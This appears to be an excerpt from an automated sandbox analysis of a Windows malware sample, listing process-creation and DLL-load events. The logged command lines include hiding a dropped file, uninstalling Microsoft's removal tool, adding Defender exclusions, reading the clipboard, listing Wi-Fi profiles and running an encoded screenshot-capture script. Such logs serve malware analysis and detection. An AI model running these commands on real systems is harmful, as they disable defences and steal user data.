                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: python3.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: libffi-7.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: sqlite3.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: libcrypto-1_1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: libssl-1_1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: dciman32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: mmdevapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: ksuser.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: avrt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: audioses.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: midimap.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
